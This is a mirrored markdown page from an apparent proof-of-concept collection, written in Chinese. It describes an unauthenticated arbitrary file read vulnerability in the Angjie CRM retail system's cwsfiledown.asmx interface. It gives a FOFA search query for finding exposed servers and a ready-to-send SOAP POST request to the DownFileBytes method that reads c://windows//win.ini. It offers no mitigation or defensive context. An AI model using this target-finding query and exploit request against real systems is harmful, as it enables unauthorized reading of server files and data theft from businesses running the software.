mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
33 lines
1.6 KiB
Markdown
33 lines
1.6 KiB
Markdown
![]() |
# 昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞
|
|||
|
|
|||
|
昂捷CRM(Customer Relationship Management)是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度,从而推动业务增长。该系统集成了客户信息管理、会员营销、客户服务等多个功能模块,为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsfiledown.asmx 接口DownFileBytes实例处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件
|
|||
|
|
|||
|
## fofa
|
|||
|
|
|||
|
```javascript
|
|||
|
body="/ClientBin/slEnjoy.App.xap"
|
|||
|
```
|
|||
|
|
|||
|
## poc
|
|||
|
|
|||
|
```xml
|
|||
|
POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1
|
|||
|
Host:
|
|||
|
Content-Type: text/xml; charset=utf-8
|
|||
|
Content-Length: length
|
|||
|
SOAPAction: "http://tempuri.org/DownFileBytes"
|
|||
|
|
|||
|
<?xml version="1.0" encoding="utf-8"?>
|
|||
|
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
|
|||
|
<soap:Body>
|
|||
|
<DownFileBytes xmlns="http://tempuri.org/">
|
|||
|
<sFileName>c://windows//win.ini</sFileName>
|
|||
|
<iPosition>1</iPosition>
|
|||
|
<iReadBytesLen>100</iReadBytesLen>
|
|||
|
<bReadBytes>ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg</bReadBytes>
|
|||
|
</DownFileBytes>
|
|||
|
</soap:Body>
|
|||
|
</soap:Envelope>
|
|||
|
```
|
|||
|
|
|||
|

|